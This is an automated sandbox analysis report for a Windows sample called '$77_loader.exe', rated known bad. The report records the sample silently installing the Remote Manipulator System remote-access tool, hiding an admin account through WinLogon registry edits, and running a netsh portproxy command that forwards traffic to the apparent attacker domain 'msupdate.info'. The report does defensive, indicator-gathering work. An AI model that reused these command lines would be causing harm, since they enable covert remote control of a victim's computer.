Analysis Overview
SHA256
3826953ded758361f9783d67242e4ba87092d637d72bcf81c649e52665c57de4
Threat Level: Known bad
The file $77_loader.exe was found to be: Known bad.
Malicious Activity Summary
RMS
Sets file execution options in registry
Executes dropped EXE
Downloads MZ/PE file
Blocklisted process makes network request
Loads dropped DLL
Enumerates connected drives
Modifies powershell logging option
Modifies WinLogon
Checks installed software on the system
Drops file in Windows directory
Drops file in Program Files directory
Enumerates physical storage devices
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Gathers network information
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-04-19 04:09
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-04-19 04:09
Reported
2022-04-19 04:12
Platform
win7-20220414-en
Max time kernel
150s
Max time network
149s
Command Line
Signatures
RMS
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | N/A |
Sets file execution options in registry
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
Checks installed software on the system
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\adm = "0" | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
Modifies powershell logging option
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\webmmux.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rmspm.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\progress.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\ntprint.inf | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unidrvui_rms.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\English.lg | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rms.lng | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\stdnames_vpd.gpd | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unidrv_rms.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\srvinst_x64.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rmsui.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\install.cmd | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\srvinst.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rmsui2.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rms_s.lng | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\fwproc.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\ntprint.inf | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rms.gpd | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\RWLN.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\webmvorbisdecoder.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rms.ini | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Russian.lg | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\uninstall.cmd | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rmspm.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unires_vpd.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\setupdrv.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\VPDAgent_x64.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unidrv_rms.hlp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\EULA.rtf | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unires_vpd.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\setupdrv.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rms.lng | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rms.gpd | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\progress.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\fwproc.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unidrvui_rms.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\VPDAgent.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\stdnames_vpd.gpd | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rmsui.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rms.ini | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\uninstall.cmd | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\webmvorbisencoder.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\vp8encoder.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\vp8decoder.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unidrv_rms.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\SampleClient.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unidrv_rms.hlp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rmsui2.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\install.cmd | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rms_s.lng | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Remote Manipulator System - Host\RIPCServer.dll | C:\Windows\system32\msiexec.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Installer\6de478.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI3339.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\ARPPRODUCTICON.exe | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\ARPPRODUCTICON.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_config_C8E9A92497A149D695F92E4E3AE550F0.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_start_C00864331B9D4391A8A26292A601EBE2.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SoftwareDistribution\config.xml | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\config.xml | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
| File created | C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\UNINST_Uninstall_R_3B1E3C8B7D0945898DA82CEEED02F0C7.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_stop_27D7873393984316BEA10FB36BB4D2F9.exe | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_stop_27D7873393984316BEA10FB36BB4D2F9.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\6de476.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\6de476.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_config_C8E9A92497A149D695F92E4E3AE550F0.exe | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\UNINST_Uninstall_R_3B1E3C8B7D0945898DA82CEEED02F0C7.exe | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_start_C00864331B9D4391A8A26292A601EBE2.exe | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\6de478.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI25C0.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\6de47a.msi | C:\Windows\system32\msiexec.exe | N/A |
Enumerates physical storage devices
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E | C:\Windows\system32\msiexec.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\AuthorizedLUAApp = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\Net | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\7ZipSfx.000\\" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\Media\1 = "DISK1;1" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\7ZipSfx.000\\" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\36341E9D66DFD914D99C6C421757C5F9\RMS | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\Version = "115998720" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\ProductIcon = "C:\\Windows\\Installer\\{D9E14363-FD66-419D-9DC9-C62471755C9F}\\ARPPRODUCTICON.exe" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\509B38EF4554FFD4794F292971C81B17\36341E9D66DFD914D99C6C421757C5F9 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\Assignment = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\InstanceType = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\PackageName = "rms.host6.3.4ru_mod_mod.msi" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\Media\DiskPrompt = "[1]" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\ProductName = "Remote Manipulator System - Host" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\Language = "1049" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\AdvertiseFlags = "388" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\DeploymentFlags = "3" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\509B38EF4554FFD4794F292971C81B17 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\Clients = 3a0000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\36341E9D66DFD914D99C6C421757C5F9 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\PackageCode = "EE22CCA5812A64F4CB23B29D2A4A798E" | C:\Windows\system32\msiexec.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\$77_loader.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\$77_loader.exe
"C:\Users\Admin\AppData\Local\Temp\$77_loader.exe"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\emin3iva.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES56F.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC56E.tmp"
C:\Windows\system32\chcp.com
"C:\Windows\system32\chcp.com" 437
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy reset
C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=757 connectport=443 connectaddress=msupdate.info
C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
C:\Users\Admin\AppData\Local\Temp\RMS.exe
"C:\Users\Admin\AppData\Local\Temp\RMS.exe"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe
"C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe" /rsetup
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rms.host6.3.4ru_mod_mod.msi" /qn
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding A8A1030EB6DCD985305E0E8F2724AD46
C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
"C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /silentinstall
C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
"C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /firewall
C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
"C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /start
C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
"C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\killself.bat
C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe
"C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe" /tray
C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe
"C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | msupdate.info | udp |
| US | 8.8.8.8:53 | csc3-2004-crl.verisign.com | udp |
| US | 8.8.8.8:53 | msupdate.info | udp |
